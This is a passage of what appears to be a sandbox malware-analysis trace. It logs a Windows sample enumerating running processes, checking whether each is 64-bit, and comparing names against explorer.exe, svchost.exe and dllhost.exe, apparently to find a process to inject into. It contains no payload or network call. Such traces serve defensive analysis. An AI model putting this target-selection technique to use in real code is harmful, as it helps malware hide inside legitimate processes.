szExeFile="knewdifferenceskaren.exe")) returned 1 [0218.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0218.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.660] CloseHandle (hObject=0xd8) returned 1 [0218.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0218.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0218.661] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.661] CloseHandle (hObject=0xd8) returned 1 [0218.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0218.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0218.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.662] CloseHandle (hObject=0xd8) returned 1 [0218.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0218.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0218.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.662] CloseHandle (hObject=0xd8) returned 1 [0218.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0218.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0218.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.663] CloseHandle (hObject=0xd8) returned 1 [0218.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0218.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0218.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.663] CloseHandle (hObject=0xd8) returned 1 [0218.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0218.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0218.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.664] CloseHandle (hObject=0xd8) returned 1 [0218.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0218.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0218.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.665] CloseHandle (hObject=0xd8) returned 1 [0218.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0218.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0218.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.665] CloseHandle (hObject=0xd8) returned 1 [0218.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0218.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0218.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.666] CloseHandle (hObject=0xd8) returned 1 [0218.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0218.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0218.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.666] CloseHandle (hObject=0xd8) returned 1 [0218.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0218.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0218.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.667] CloseHandle (hObject=0xd8) returned 1 [0218.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0218.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0218.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.668] CloseHandle (hObject=0xd8) returned 1 [0218.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0218.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0218.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.668] CloseHandle (hObject=0xd8) returned 1 [0218.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0218.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0218.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.669] CloseHandle (hObject=0xd8) returned 1 [0218.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0218.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0218.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.669] CloseHandle (hObject=0xd8) returned 1 [0218.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0218.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0218.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.670] CloseHandle (hObject=0xd8) returned 1 [0218.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0218.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0218.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0218.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0218.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0218.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0218.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0218.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.673] CloseHandle (hObject=0xd8) returned 1 [0218.673] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0218.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0218.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.674] CloseHandle (hObject=0xd8) returned 1 [0218.674] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0218.674] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0218.674] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0218.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0218.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0218.675] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.675] CloseHandle (hObject=0xd8) returned 1 [0218.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0218.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.676] CloseHandle (hObject=0xd8) returned 1 [0218.676] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0218.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0218.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.676] CloseHandle (hObject=0xd8) returned 1 [0218.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0218.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0218.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.678] CloseHandle (hObject=0xd8) returned 1 [0218.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0218.678] CloseHandle (hObject=0xd4) returned 1 [0218.678] Sleep (dwMilliseconds=0x3e8) [0219.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0219.715] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0219.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0219.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0219.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0219.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0219.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0219.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0219.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0219.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0219.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0219.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0219.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0219.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0219.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0219.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0219.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0219.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0219.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0219.725] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0219.725] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.725] CloseHandle (hObject=0xd8) returned 1 [0219.726] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0219.726] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0219.726] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0219.726] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0219.726] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0219.727] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.727] CloseHandle (hObject=0xd8) returned 1 [0219.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0219.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0219.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0219.727] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0219.727] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 